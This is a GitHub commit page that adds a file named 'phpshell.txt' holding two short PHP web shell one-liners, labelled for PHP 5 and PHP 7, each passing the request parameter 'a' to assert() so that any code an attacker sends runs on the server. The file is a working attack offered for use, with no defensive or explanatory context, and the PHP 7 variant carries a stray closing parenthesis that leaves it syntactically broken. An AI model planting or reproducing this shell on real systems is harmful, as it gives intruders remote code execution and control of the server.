Skip to content

Commit c8360d3

Browse files
authored
Create phpshell.txt
1 parent a188074 commit c8360d3

1 file changed

Lines changed: 9 additions & 0 deletions

File tree

phpshell.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
//php5
2+
<?php
3+
$a='assert';
4+
[""=>$a($_REQUEST['a'])];
5+
?>
6+
//php7
7+
<?php
8+
'assert'($_REQUEST['a']));
9+
?>

0 commit comments

Comments
 (0)